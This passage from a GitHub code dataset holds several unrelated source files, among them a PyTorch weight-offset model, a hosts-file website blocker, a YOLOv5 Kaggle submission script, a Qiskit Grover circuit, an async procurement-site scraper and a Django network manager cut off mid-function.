)\n\nprint( \"Total a ortho vs full deviation:\", total_a_deviation )\nprint( \"Total distance:\", total_dist )\n","repo_name":"CraGL/Hyperspectral-Inverse-Skinning","sub_path":"save_to_matlab_test.py","file_name":"save_to_matlab_test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"5605528523","text":"import torch\nfrom torch import nn\n\n\nclass WeightOffsets(nn.Module):\n def __init__(self, row_dim, column_dim):\n super().__init__()\n self.v = nn.Parameter(torch.ones(1))\n self.linear1 = nn.Linear(1, row_dim)\n self.linear2 = nn.Linear(1, column_dim)\n self.linear_column = nn.Linear(row_dim, row_dim)\n self.linear_row = nn.Linear(column_dim, column_dim)\n\n def forward(self):\n vx = self.linear1(self.v) # (row_dim)\n vy = self.linear2(self.v) # (column_dim)\n # matrix multiplication -> (row_dim, column_dim)\n v_matrix = vx.unsqueeze(0).T * vy.unsqueeze(0)\n # columnwise\n v_matrix = self.linear_column(v_matrix.T)\n # rowwise\n v_matrix = self.linear_row(v_matrix.T)\n return v_matrix.T\n\n\nclass 
Model(nn.Module):\n def __init__(self):\n super().__init__()\n self.wo = WeightOffsets(32, 16)\n self.linear = nn.Linear(32, 16)\n self.init_weight = None\n self.wo_out = None\n self.linear.weight.register_hook(self.wo_backward)\n\n def wo_backward(self, grad):\n print(\"grad:\", grad)\n grad = grad * self.init_weight\n self.wo_out.backward(grad)\n\n def update_weight(self):\n if self.init_weight is None:\n self.init_weight = self.linear.weight.data.clone()\n self.wo_out = self.wo()\n self.linear.weight.data = self.init_weight * (1 + self.wo_out)\n\n def forward(self, x):\n self.update_weight()\n y = self.linear(x)\n return y\n\n\nif __name__ == '__main__':\n model = Model()\n # model = WeightOffsets(32, 16)\n # linear = torch.nn.Linear(32, 16)\n # # linear.requires_grad_(False)\n # init_weight = linear.weight.data.clone()\n optimizer = torch.optim.AdamW(model.wo.parameters(), lr=0.01)\n # train!\n model.train()\n optimizer.zero_grad()\n\n x = torch.randn(2, 32)\n y = torch.randn(2, 16)\n # wo_weight = model()\n print(model.wo.v)\n # linear.weight.data = init_weight * (1 + wo_weight)\n # out = linear(x)\n out = model(x)\n loss = nn.functional.mse_loss(y, out)\n # loss = wo_weight.sum()\n print(\"loss:\", loss)\n loss.backward()\n # grad = linear.weight.grad * init_weight\n # wo_weight.backward(grad)\n optimizer.step()\n print(model.wo.v)","repo_name":"mkshing/e4t-diffusion","sub_path":"e4t/weightoffsets.py","file_name":"weightoffsets.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"66"} +{"seq_id":"41767158165","text":"import time \r\nfrom datetime import datetime as dt \r\n\r\n# change hosts path according to your OS\r\nhosts_path =\"C:\\Windows\\System32\\drivers\\etc\\hosts\"\r\n# localhost's IP \r\nredirect = \"127.0.0.1\"\r\n\r\n# websites That you want to block\r\nno_of_site=int(input(\"how many no of site you want to block\"))\r\n\r\nfor i in range(1,no_of_site+1):\r\n website_list=[]\r\n website=input(\"enter the site url name: \")\r\n website_list.append(website)\r\n\r\nstartTime=int(input(\"enter the start time (in 24hrs format):\"))\r\nendTime=int(input(\"enter the end time (in 24hrs format):\"))\r\nwhile True: \r\n\r\n\t# time of your work \r\n\tif dt(dt.now().year, dt.now().month, dt.now().day,startTime)< dt.now() < dt(dt.now().year, dt.now().month, dt.now().day,endTime): \r\n\t\tprint(\"Working hours...time to block the site\") \r\n\t\twith open(hosts_path, 'r+') as file:\r\n\t\t\tcontent = file.read()\r\n\t\t\tfor site in website_list: \r\n\t\t\t\tif website in content: \r\n\t\t\t\t\tpass\r\n\t\t\t\telse: \r\n\t\t\t\t\t#wrinting the localhost ip and website\r\n\t\t\t\t\tfile.write(redirect + \" \" + website + \"\\n\") \r\n\telse: \r\n\t\twith open(hosts_path, 'r+') as file: \r\n\t\t\tcontent=file.readlines() \r\n\t\t\tfile.seek(0) \r\n\t\t\tfor line in content: \r\n\t\t\t\tif not any(website in line for website in website_list): \r\n\t\t\t\t\tfile.write(line) \r\n\r\n\t\t\t# removing hostnmes from host file \r\n\t\t\tfile.truncate() \r\n\r\n\t\tprint(\"Fun hours...unblocking all site\") \r\n\ttime.sleep(5) \r\n","repo_name":"tanya3007/Python-website-blocker","sub_path":"blocker.py","file_name":"blocker.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11117841619","text":"# %% [markdown]\n# # Inference\n# \n# You will probably use a `Submission.ipynb` kernel to run all the 
predictions. After training a YOLOv5 based object detector -> head to the artifacts page and download the best model -> upload the model as a Kaggle dataset -> Use it with the submission folder. \n# \n# > 📍 Note that you might have to clone the YOLOv5 repository in a Kaggle dataset as well. \n# \n# In this section, I will show you how you can do the inference and modify the predicted bounding box coordinates.\n\n# %%\n# TEST_PATH = '/kaggle/input/siim-covid19-resized-to-256px-jpg/test/' # absolute path\nTEST_PATH = '../input/test/' # absolute path\n\n# %% [markdown]\n# Since I am training the model in this kernel itself, I will not be using the method that I have described above. The best model is saved in the directory `project_name/exp*/weights/best.pt`. In `exp*`, * can be 1, 2, etc. \n\n# %%\n# MODEL_PATH = 'kaggle-siim-covid/exp/weights/best.pt'\nMODEL_PATH = '../models/exp1/best.pt'\n\n# %% [markdown]\n# ```\n# --weights {MODEL_PATH} \\ # path to the best model.\n# --source {TEST_PATH} \\ # absolute path to the test images.\n# --img {IMG_SIZE} \\ # Size of image\n# --conf 0.281 \\ # Confidence threshold (default is 0.25)\n# --iou-thres 0.5 \\ # IOU threshold (default is 0.45)\n# --max-det 3 \\ # Number of detections per image (default is 1000) \n# --save-txt \\ # Save predicted bounding box coordinates as txt files\n# --save-conf # Save the confidence of prediction for each bounding box\n# ```\n\n# %%\nget_ipython().system('python detect.py --weights {MODEL_PATH} --source {TEST_PATH} --img {IMG_SIZE} --conf 0.281 --iou-thres 0.5 --max-det 3 --save-txt --save-conf')\n\n# %% [markdown]\n# ### How to find the confidence score?\n# \n# 1. First first the [W&B run page](https://wandb.ai/ayush-thakur/kaggle-siim-covid/runs/jbt74n7q) generated by training the YOLOv5 model. \n# \n# 2. Go to the media panel -> click on the F1_curve.png file to get a rough estimate of the threshold -> go to the Bounding Box Debugger panel and interactively adjust the confidence threshold. \n# \n# %% [markdown]\n# > 📍 The bounding box coordinates are saved as text file per image name. It is saved in this directory `runs/detect/exp3/labels`. \n\n# %%\nPRED_PATH = 'runs/detect/exp3/labels'\n\n\n# %%\n# Visualize predicted coordinates.\n\n# %% [markdown]\n# > 📍 Note: 1 is class id (opacity), the first four float numbers are `x_center`, `y_center`, `width` and `height`. The final float value is `confidence`.\n\n# %%\nprediction_files = os.listdir(PRED_PATH)\nprint('Number of test images predicted as opaque: ', len(prediction_files))\n\n# %% [markdown]\n# > 📍 Out of 1263 test images, 583 were predicted with `opacity` label and thus we have that many prediction txt files.\n# %% [markdown]\n# # Submission\n# \n# In this section, I will show how you can use YOLOv5 as object detector and prepare `submission.csv` file.\n\n# %%\n# The submisison requires xmin, ymin, xmax, ymax format. 
\n# YOLOv5 returns x_center, y_center, width, height\ndef correct_bbox_format(bboxes):\n correct_bboxes = []\n for b in bboxes:\n xc, yc = int(np.round(b[0]*IMG_SIZE)), int(np.round(b[1]*IMG_SIZE))\n w, h = int(np.round(b[2]*IMG_SIZE)), int(np.round(b[3]*IMG_SIZE))\n\n xmin = xc - int(np.round(w/2))\n xmax = xc + int(np.round(w/2))\n ymin = yc - int(np.round(h/2))\n ymax = yc + int(np.round(h/2))\n \n correct_bboxes.append([xmin, xmax, ymin, ymax])\n \n return correct_bboxes\n\n# Read the txt file generated by YOLOv5 during inference and extract \n# confidence and bounding box coordinates.\ndef get_conf_bboxes(file_path):\n confidence = []\n bboxes = []\n with open(file_path, 'r') as file:\n for line in file:\n preds = line.strip('\\n').split(' ')\n preds = list(map(float, preds))\n confidence.append(preds[-1])\n bboxes.append(preds[1:-1])\n return confidence, bboxes\n\n\n# %%\n# Read the submisison file\n# sub_df = pd.read_csv('/kaggle/input/siim-covid19-detection/sample_submission.csv')\nsub_df = pd.read_csv('../input/sample_submission.csv')\nsub_df.tail()\n\n\n# %%\n# Prediction loop for submission\npredictions = []\n\nfor i in tqdm(range(len(sub_df))):\n row = sub_df.loc[i]\n id_name = row.id.split('_')[0]\n id_level = row.id.split('_')[-1]\n \n if id_level == 'study':\n # do study-level classification\n predictions.append(\"Negative 1 0 0 1 1\") # dummy prediction\n \n elif id_level == 'image':\n # we can do image-level classification here.\n # also we can rely on the object detector's classification head.\n # for this example submisison we will use YOLO's classification head. \n # since we already ran the inference we know which test images belong to opacity.\n if f'{id_name}.txt' in prediction_files:\n # opacity label\n confidence, bboxes = get_conf_bboxes(f'{PRED_PATH}/{id_name}.txt')\n bboxes = correct_bbox_format(bboxes)\n pred_string = ''\n for j, conf in enumerate(confidence):\n pred_string += f'opacity {conf} ' + ' '.join(map(str, bboxes[j])) + ' '\n predictions.append(pred_string[:-1]) \n else:\n predictions.append(\"None 1 0 0 1 1\")\n\n\n# %%\nsub_df['PredictionString'] = predictions\n# sub_df.to_csv('submission.csv', index=False)","repo_name":"R1ck29/kaggle-siim-fisabio-rsna-covid-19-detection","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43242190221","text":"import PIL\nimport torch\nimport torchvision.transforms as transforms\n\nimg = PIL.Image.open('MobileFaceNet_Tutorial_Pytorch/images/nagyung1.jpg')\n# img.show()\n\ntf = transforms.ToTensor() # torch tensor로 변환\nimg_t = tf(img)\nprint(img_t.size()) # channel, height, width\n\ntf = transforms.ToPILImage() # Tensor에서 PIL로 변환\nimg_t = tf(img_t)\nprint(img_t) # \n\nimg_t.show()\n\n","repo_name":"nagggyung/TIL-","sub_path":"PIL/PyTorch에서 이미지 열기.py","file_name":"PyTorch에서 이미지 열기.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29225651943","text":"# Tested with python 3.8.12, qiskit 0.34.2, numpy 1.22.2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom qiskit import QuantumCircuit\n\ndef make_grover_circuit(n_qubits):\n\n grover_circuit = QuantumCircuit(n_qubits)\n\n grover_circuit.h(range(n_qubits))\n\n # オラクルを作��して、回路に実装\n oracle = QuantumCircuit(n_qubits)\n\n # N=45のオラクル\n ##################\n ### EDIT BELOW ###\n ##################\n oracle.x(1)\n 
oracle.x(4)\n oracle.h(n_qubits-1)\n oracle.mct(list(range(n_qubits-1)), n_qubits-1)\n oracle.h(n_qubits-1)\n oracle.x(1)\n oracle.x(4)\n ##################\n ### EDIT ABOVE ###\n ##################\n oracle_gate = oracle.to_gate()\n oracle_gate.name = \"U_w\"\n\n def diffuser(n):\n qc = QuantumCircuit(n)\n\n qc.h(range(n))\n\n ##################\n ### EDIT BELOW ###\n ##################\n qc.rz(2*np.pi, n-1)\n qc.x(list(range(n)))\n\n # multi-controlled Zゲート\n qc.h(n-1)\n qc.mct(list(range(n-1)), n-1)\n qc.h(n-1)\n\n qc.x(list(range(n)))\n ##################\n ### EDIT ABOVE ###\n ##################\n\n qc.h(range(n))\n\n U_s = qc.to_gate()\n U_s.name = \"U_s\"\n return U_s\n\n\n grover_circuit.append(oracle_gate, list(range(n_qubits)))\n grover_circuit.append(diffuser(n_qubits), list(range(n_qubits)))\n grover_circuit.measure_all()\n #grover_circuit.decompose().draw('mpl')\n\n return grover_circuit\n","repo_name":"UTokyo-ICEPP/qc-workbook","sub_path":"source/qc_workbook/grover.py","file_name":"grover.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"66"} +{"seq_id":"40076506616","text":"import re\n\nwith open('./inp/02.txt') as f:\n inp = [line.rstrip() for line in f.readlines()]\n\nvalid = 0\nfor line in inp:\n [one, two, char, pw] = re.match(r'(\\d+)-(\\d+) (\\w): (\\w+)', line).groups()\n positions = pw[int(one) - 1] + pw[int(two) - 1]\n if char in positions and positions[0] != positions[1]:\n valid += 1\n \nprint(valid)\n","repo_name":"Abarn279/advent-of-code-2020","sub_path":"02b.py","file_name":"02b.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24220473924","text":"import asyncio\nimport re\n\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\nfrom django.core.cache import cache\n\n\nfrom .controller import Controller\n\n\nclass Parse:\n __first_url = \"https://zakupki.gov.ru/epz/order/extendedsearch/results.html\"\n __headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'}\n \n \n async def get_page(self, url, page):\n conn = aiohttp.TCPConnector(limit_per_host=1)\n params = [(\"pageNumber\", str(page)),]\n key = f'url{page}'\n html = cache.get(key)\n if not html:\n async with aiohttp.ClientSession(connector=conn,timeout=aiohttp.ClientTimeout(total=60)) as session:\n async with session.get(url, headers=self.__headers, ssl=True, params = params) as response:\n html = await response.text()\n\n cache.add(key, value=html)\n \n return html\n \n \n async def get_soup_object(self, url, page = 1):\n html = await self.get_page(url, page)\n return BeautifulSoup(html, 'lxml')\n \n \n async def get_pagination(self):\n url = self.__first_url\n soup = await self.get_soup_object(url)\n pagination = soup.find(\"div\", {\"class\": \"paginator-block\"}).find(\"div\", {\"class\": \"paginator align-self-center m-0\"}).find_all(\"li\")[-1].text\n return int(pagination)\n \n\n async def parse(self, url, page):\n \n soup = await self.get_soup_object(url, page)\n \n cards = soup.find_all(\"div\", {\"class\": \"row no-gutters registry-entry__form mr-0\"})\n result_array = []\n controller = Controller()\n \n for card in cards: \n number = card.find(\"div\", {\"class\" : \"registry-entry__header-mid__number\"}).find(\"a\").text\n number = re.search(r'[0-9]+', number).group(0)\n try:\n start_price = card.find(\"div\", 
{\"class\": \"price-block__value\"}).text# перевести в float\n start_price = float(re.match(r'[0-9\\s]+\\,[0-9]+',start_price).group(0).replace(\"\\xa0\", \"\").replace(\",\", \".\"))\n result_array.append((number,start_price))\n except AttributeError:\n start_price = 0\n result_array.append((re.search(r'[0-9]+', number).group(0),0)) \n await controller.create(number, start_price) \n return result_array\n\n async def main(self):\n tasks = []\n pagination = await self.get_pagination()\n for i in range(1, pagination):\n url = \"https://zakupki.gov.ru/epz/order/extendedsearch/results.html\"\n tasks.append(asyncio.create_task(self.parse(url, i)))\n results = await asyncio.gather(*tasks)\n return results\n\n\n","repo_name":"Saitama12-afro1/DjangoParse","sub_path":"DjangoParse/app/pasre.py","file_name":"pasre.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"75157600851","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\nmaps = []\n\nfor _ in range(n):\n lines = list(map(int, sys.stdin.readline().rstrip().split()))\n maps.append(lines)\n\n# 경우의 수를 보관할 배열\nd = [[0] * n for _ in range(n)]\n\n\ndef solution(n, maps, d):\n d[0][0] = 1\n\n for i in range(n):\n for j in range(n):\n distance = maps[i][j]\n\n # 3. 종료 조건 (0은 더 이상 진행을 막는 종착점이다.)\n if not distance:\n break\n\n # 1. 기준으로부터 아래쪽으로 진행하는 경우\n if 0 <= i + distance < n:\n d[i + distance][j] += d[i][j]\n \n # 2. 기준으로부터 오른쪽으로 진행하는 경우\n if 0 <= j + distance < n:\n d[i][j + distance] += d[i][j]\n\n return d[n - 1][n - 1]\n\n\nprint(solution(n, maps, d))\n","repo_name":"ddu0422/study","sub_path":"algorithm/baekjoon/dp/silver1/1890.py","file_name":"1890.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31070222599","text":"\n# coding: utf-8\n\n# # # PANDA GROUP BY\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[4]:\n\n\ndata = {'Company' : ['GOOG','GOOG','MSFT','MSFT','FB','FB'],\n 'PERSON' : ['A','B','C','D','E','F'],\n 'SALES' : [100,200,300,400,500,600]}\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(data)\n\n\n# In[6]:\n\n\ndf\n\n\n# In[9]:\n\n\nbyCompany = df.groupby('Company')\n\n\n# In[10]:\n\n\nbyCompany.mean()\n\n\n# In[11]:\n\n\nbyCompany.sum()\n\n\n# In[12]:\n\n\nbyCompany.std()\n\n\n# In[13]:\n\n\nbyCompany.sum().loc['FB']\n\n\n# In[14]:\n\n\nbyCompany.count()\n\n\n# In[15]:\n\n\nbyCompany.max()\n\n\n# In[16]:\n\n\nbyCompany.min()\n\n\n# In[17]:\n\n\ndf.describe()\n\n\n# In[18]:\n\n\ndf.describe().transpose()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AvinashTiwari/FinacialPhyton","sub_path":"Panda/Panda_Group_By.py","file_name":"Panda_Group_By.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11677095310","text":"from .Assignment import Assignment\n\n# =======================================================================\n# AGDocument class\n# =======================================================================\nclass AGDocument(object):\n def __init__(self):\n self.assignmentName = ''\n self.assignmentID = ''\n self.assignment = Assignment() # the one and only assignment object\n self.htmlReport = ''\n self.dataFiles = [] # a list of input data files needed by the programs under test\n self.testDataFiles = [] # a list of test 
files.\n","repo_name":"jvolcy/AutoGrader3","sub_path":"AutoGrader3/AGDocument.py","file_name":"AGDocument.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"424615489","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport subprocess\nfrom .code_helper import CodeHelper\n\n\nclass ExtendProcesses:\n _class_file = __file__\n _debug_name = 'ExtendProcesses'\n\n @staticmethod\n def get_exec_path():\n return os.path.dirname(os.path.dirname(ExtendProcesses._class_file))\n\n @staticmethod\n def run(script, script_args=[], errors=''):\n \"\"\" \"\"\"\n if not CodeHelper.check_file(script):\n raise FileExistsError(ExtendProcesses._debug_name + '.run: Try execute undefined script: {}'. format(script))\n cmd_args = []\n cmd_args.append(sys.executable)\n cmd_args.append(script)\n if script_args:\n for ix in script_args:\n cmd_args.append(ix)\n stdin_point = subprocess.PIPE\n stdout_point = subprocess.PIPE\n stderr_point = subprocess.PIPE\n if '' != errors and CodeHelper.check_file(errors):\n stderr_point = open(errors, 'w', encoding='utf8')\n __call_args = {}\n __call_args['stdin'] = stdin_point\n __call_args['stdout'] = stdout_point\n __call_args['stderr'] = stderr_point\n __call_args['cwd'] = ExtendProcesses.get_exec_path()\n __call_args['env'] = {**os.environ, 'PYTHONPATH': os.pathsep.join(sys.path)}\n if not sys.platform.startswith('win'):\n __call_args['encoding'] = 'utf8' # Exception on windows 7 with code/decode in subprocess\n script_call = subprocess.Popen(cmd_args, **__call_args)\n return script_call\n\n @staticmethod\n def update_sys_path():\n sys.path.insert(0, ExtendProcesses.get_exec_path())\n\n @staticmethod\n def stop(_pid):\n _flg = False\n try:\n _pid = int(_pid)\n _real_pid = _pid\n ExtendProcesses.__kill_process(_real_pid)\n _flg = True\n except Exception as ex:\n raise ex\n return _flg\n\n @staticmethod\n def __kill_process(_pid):\n import signal\n os.kill(_pid, signal.SIGTERM)\n pass\n","repo_name":"sp4plm/SPLM","sub_path":"app/utilites/extend_processes.py","file_name":"extend_processes.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"25951548103","text":"#Dojo\n\nnumbers= [-5, 23, 0, -9, 12, 99, 105, -43]\nnumbersLenght = len(numbers)\n\n#Calculating the max\n\nx = 0\nfor i in numbers:\n inum = float(i)\n if inum < x:\n x = inum\nprint (x)\n\n\n#calculating the min\n\nx = 0\nfor i in numbers:\n inum = float(i)\n if inum > x:\n x = inum\nprint (x)\n\n#Calculating the average\n\nnumbersSum= 0\nfor i in range(0, numbersLenght):\n numbersSum += numbers[i]\nprint(f'{numbersSum/numbersLenght}')","repo_name":"alinmuraretu/alin1987","sub_path":"programsmad/mini_max_avg.py","file_name":"mini_max_avg.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37960759751","text":"# https://leetcode-cn.com/problems/reverse-words-in-a-string/\n\n\nclass Solution:\n def reverseWords(self, s: str) -> str:\n s_list = s.strip().split(\" \")\n s_list = list(filter(None, s_list)) # 过滤空字符串\n res = \"\"\n for item in s_list[::-1]:\n res += item\n res += \" \"\n return res.strip()\n\n\nif __name__ == '__main__':\n print(Solution().reverseWords(s=\"a good 
example\"))","repo_name":"calmisential/My_Leetcode_Solutions","sub_path":"python题解/101~200/0151_翻转字符串里的单词.py","file_name":"0151_翻转字符串里的单词.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33420569752","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nFile with different routines to hold tests on expected_destinations\n\"\"\"\nfrom __future__ import print_function\n\nimport time\n\nfrom nile.api.v1 import clusters\nfrom requests import request\n\n\ncluster = clusters.Hahn()\n\n\ndef query_from_record_v1(record):\n return {\n 'routes_info': [\n [\n obj['source']['full_text'],\n obj['source']['lon'],\n obj['source']['lat'],\n obj['destinations']['full_text'],\n obj['destinations']['lon'],\n obj['destinations']['lat'],\n obj['created'],\n ]\n for obj in record.routes_info\n ],\n 'source': {\n 'point': [\n record.last_route['source']['lon'],\n record.last_route['source']['lat'],\n ],\n 'full_text': record.last_route['source']['full_text'],\n },\n 'time': record.time,\n }\n\n\ndef query_from_record_v2(record):\n return {\n 'history': [\n {\n \"source\": obj['source'],\n \"destination\": (\n obj['destinations'] if obj['destinations']['lon'] else None\n ),\n \"created\": obj['created'],\n }\n for obj in record.routes_info\n ],\n 'source': record.last_route['source'],\n 'time': record.time,\n }\n\n\nversions = {\n \"vladvo_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://vladvo.haze.yandex.net/expected_destinations\",\n },\n \"vladvo_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://vladvo.haze.yandex.net/v2.0/expected_destinations\"),\n },\n \"dev_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://ml.taxi.dev.yandex.net/expected_destinations\",\n },\n \"dev_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://ml.taxi.dev.yandex.net/v2.0/expected_destinations\"),\n },\n \"tst_v1\": {\n \"query_from_record\": query_from_record_v1,\n \"target_host\": \"http://ml.taxi.tst.yandex.net/expected_destinations\",\n },\n \"tst_v2\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://ml.taxi.tst.yandex.net/v2.0/expected_destinations\"),\n },\n \"load_075\": {\n \"query_from_record\": query_from_record_v2,\n \"target_host\": (\n \"http://target075i.load.yandex.net/v2.0/expected_destinations\"),\n \"headers\": {\n \"Host\": \"ml.taxi.dev.yandex.net\",\n },\n },\n}\n\nammos_table_path = '//home/taxi_ml/suggest/golden_set/set_second_half_feb_2018'\n\n\ndef prepare_queries(version, i_from, i_to):\n print(\"Preparing queries for {}\".format(version))\n query_from_record = versions[version][\"query_from_record\"]\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n queries_obj = {i + i_from: query_from_record(record)\n for i, record in enumerate(ammos)}\n import json\n json.dump(\n queries_obj, open(\"queries_{}_{}.json\".format(i_from, i_to), mode=\"w\"))\n\n\ndef prepare_ammo(version, i_from, i_to, handler_name):\n print(\"Preparing ammo for {}\".format(version))\n f = open(\"ammo_{}_{}_{}.txt\".format(version, i_from, i_to), mode=\"w\")\n query_from_record = versions[version][\"query_from_record\"]\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n print(\"[Host: ml.taxi.dev.yandex.net]\\n\"\n \"[Content-type: application/json]\\n[User-agent: tank]\", 
file=f)\n import json\n for record in ammos:\n query = query_from_record(record)\n query_string = json.dumps(query)\n print(len(query_string), handler_name, file=f)\n print(query_string, file=f)\n f.close()\n\n\ndef test_mlaas(version, i_from, i_to, return_features=False):\n print(\"Started testing {} from {} to {}\".format(version, i_from, i_to))\n query_from_record = versions[version][\"query_from_record\"]\n target_host = versions[version][\"target_host\"]\n headers = versions[version].get(\"headers\", None)\n print(\"Target host:\", target_host)\n if return_features:\n print(\"Getting features\")\n ammos = cluster.read(ammos_table_path)[i_from:i_to]\n print(\"Data loaded from YT\")\n for i, record in enumerate(ammos):\n real_i = i + i_from\n response_code = -1\n try:\n req_params = {\n \"json\": query_from_record(record),\n }\n if headers:\n req_params[\"headers\"] = headers\n if return_features:\n req_params[\"params\"] = {\"features\": 1}\n for sleep_seconds in [1, 2]:\n response = request(\"post\", target_host, **req_params)\n response_code = response.status_code\n if response_code == 200:\n break\n time.sleep(sleep_seconds)\n if response_code == 200:\n response.json()\n finally:\n print(\"{} : {}\".format(real_i, response_code))\n print(\"Testing finished\")\n\n\ntest_mlaas(\"load_075\", 0, 1000, False)\n\n# prepare_ammo(\"dev_v2\", 0, 100, \"/v2.0/expected_destinations\")\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/GENERAL/test_expected_destinations.py","file_name":"test_expected_destinations.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42210316916","text":"import logging\nimport ipaddress\n\nfrom web_manage.yzy_edu_desktop_mgr.models import *\nfrom web_manage.yzy_user_desktop_mgr.models import *\nfrom web_manage.yzy_resource_mgr.models import *\nfrom web_manage.yzy_user_desktop_mgr import models as personal_model\nfrom web_manage.common.http import server_post\nfrom web_manage.common.log import operation_record, insert_operation_log\nfrom web_manage.common.utils import get_error_result, JSONResponse, is_ip_addr, is_netmask\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkManager(object):\n\n def get_object_by_uuid(self, model, uuid):\n try:\n obj = model.objects.filter(deleted=False).get(uuid=uuid)\n return obj\n except Exception as e:\n return None\n\n def get_object_by_name_and_not_uuid(self, model, name, uuid):\n try:\n obj = model.objects.filter(deleted=False).exclude(uuid=uuid).get(name=name)\n return obj\n except Exception as e:\n return None\n\n def check_subnet_params(self, data, subnets=None):\n start_ip = data.get('start_ip')\n end_ip = data.get('end_ip')\n gateway = data.get('gateway')\n netmask = data.get('netmask')\n dns1 = data.get('dns1')\n dns2 = data.get('dns2')\n if not start_ip or not end_ip or not gateway or not netmask or not dns1:\n return get_error_result(\"ParameterError\"), False\n\n for i in [start_ip, end_ip, gateway, dns1, netmask]:\n if not is_ip_addr(i):\n return get_error_result(\"IpAddressGatewayDnsAddressError\"), False\n if dns2 and dns2 != '' and not is_ip_addr(dns2):\n return get_error_result(\"DnsAddressError\"), False\n\n _is_netmask, netmask_bits = is_netmask(netmask)\n if _is_netmask:\n network_num = ipaddress.ip_interface(start_ip + '/' + str(netmask_bits)).network\n if ipaddress.ip_address(end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n return 
get_error_result(\"GatewayAndIpError\"), False\n else:\n return get_error_result(\"SubnetMaskError\"), False\n\n if ipaddress.ip_network(start_ip).compare_networks(ipaddress.ip_network(end_ip)) >= 0:\n return get_error_result(\"EndIPLessThanStartIP\"), False\n\n if subnets is not None:\n exit_subnets = []\n for subnet in subnets:\n flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n exit_subnets.append(subnet)\n if len(exit_subnets) > 0:\n return get_error_result(\"IpAddressConflictError\"), False\n\n return '', True\n\n\n @operation_record(\"创建数据网络 {data[name]}\")\n def create_network(self, data):\n \"\"\"\n {\n \"name\": \"test_network2\",\n \"switch_uuid\" : \"9c7050ba-5213-11ea-9d93-000c295dd728\",\n \"vlan_id\" : 12,\n \"subnet_info\": {\n \"name\": \"subnet1\",\n \"start_ip\": \"192.168.1.10\",\n \"end_ip\": \"192.168.1.20\",\n \"netmask\": \"255.255.255.0\",\n \"gateway\": \"192.168.1.0\",\n \"dns1\": \"8.8.8.8\"\n }\n }\n :param data:\n :return:\n \"\"\"\n virtual_switch_uuid = data.get(\"switch_uuid\")\n virtual_switch = self.get_object_by_uuid(YzyVirtualSwitchs, virtual_switch_uuid)\n if not virtual_switch:\n logger.error(\"create data-network error: virtual switch [%s] not exist!\"% 